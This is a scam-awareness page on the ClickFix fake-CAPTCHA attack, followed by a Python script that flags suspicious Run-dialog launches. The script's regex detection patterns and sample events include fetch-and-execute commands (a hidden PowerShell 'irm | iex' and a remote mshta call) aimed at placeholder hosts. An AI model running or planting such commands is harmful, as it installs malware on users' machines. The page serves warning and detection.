ClickFix

Also Known As: CrashFix - ScanFix - DragFix - ConsentFix - UpdateFix
Fake CAPTCHA Copy and Paste Scam
ClickFix Windows Crash Screenshot

Scam Summary


The ClickFix attack and its many variants affect Windows and Mac users in the form of fake CAPTCHAs, AI chat browser extensions, update notifications, and crash errors.

ClickFix is a social engineering attack that uses a fake CAPTCHA or error window to trick users into running malicious software by following keyboard shortcut instructions.

If you see instructions in a pop-up or notification window that tell you to use keyboard commands to copy and paste text, open the Mac Terminal or the Windows Run dialog, or copy the URL from your browser address bar, STOP!

Scam Details

ClickFix can appear to be a CAPTCHA test that asks you to prove to a website that you are human. It directs you to press key combinations as part of the "verification" process. In reality, those key combinations are shortcut commands that open the Windows Run dialog and paste in a malicious script that installs malware.

The same method has been seen in multiple forms, such as a fake Windows blue screen crash (BSOD), a prompt to agree to an update, and a login page for online services like Microsoft 365.
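As an added example (not part of the original page), the following Python script looks at the mechanism described above from the defender's side: it scans process-creation events (Sysmon Event ID 1 field names are assumed) for a script host launched from the Run dialog, which shows explorer.exe as the parent, with a command line that downloads, hides or encodes what it runs. The events, hostnames and paths are constructed placeholders.

```python
import re

# Script hosts that a command pasted into the Run dialog typically lands in.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}

# Defensive indicators: any hit on a Run-dialog launch is worth a review.
INDICATORS = {
    "download_cradle": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|curl|wget|downloadstring)\b"
        r"|https?://", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "bypass_policy": re.compile(r"-e(p|xecutionpolicy)\s+bypass", re.I),
    "mshta_remote": re.compile(r"mshta(\.exe)?\s+\S*https?://", re.I),
}

def analyze(event):
    """Return the indicator names hit by one process-creation event, or []
    if the launch is out of scope (not from the Run dialog) or looks clean."""
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    # Run-dialog launches have explorer.exe as the parent; ignoring everything
    # else keeps a developer fetching a URL from a terminal out of the results.
    if parent != "explorer.exe" or image not in SCRIPT_HOSTS:
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(event["CommandLine"])]

def triage(events):
    """Return (command line, hits) for every event that matches the pattern."""
    return [(e["CommandLine"], hits) for e in events if (hits := analyze(e))]

# Constructed sample events; the .invalid hosts are placeholders, not real indicators.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "irm https://captcha-check.example.invalid/v | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://verify.example.invalid/check.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe",          # ordinary Run-dialog use
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c ipconfig /all"},
    {"ParentImage": r"C:\Program Files\Code\Code.exe",   # terminal, not the Run dialog
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -c "irm https://api.example.invalid/status"'},
]

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_EVENTS):
        print(f"REVIEW {hits}: {cmd}")
```

Only the two Run-dialog launches with download or hiding indicators are reported; the benign Run-dialog command and the terminal-launched download are left alone.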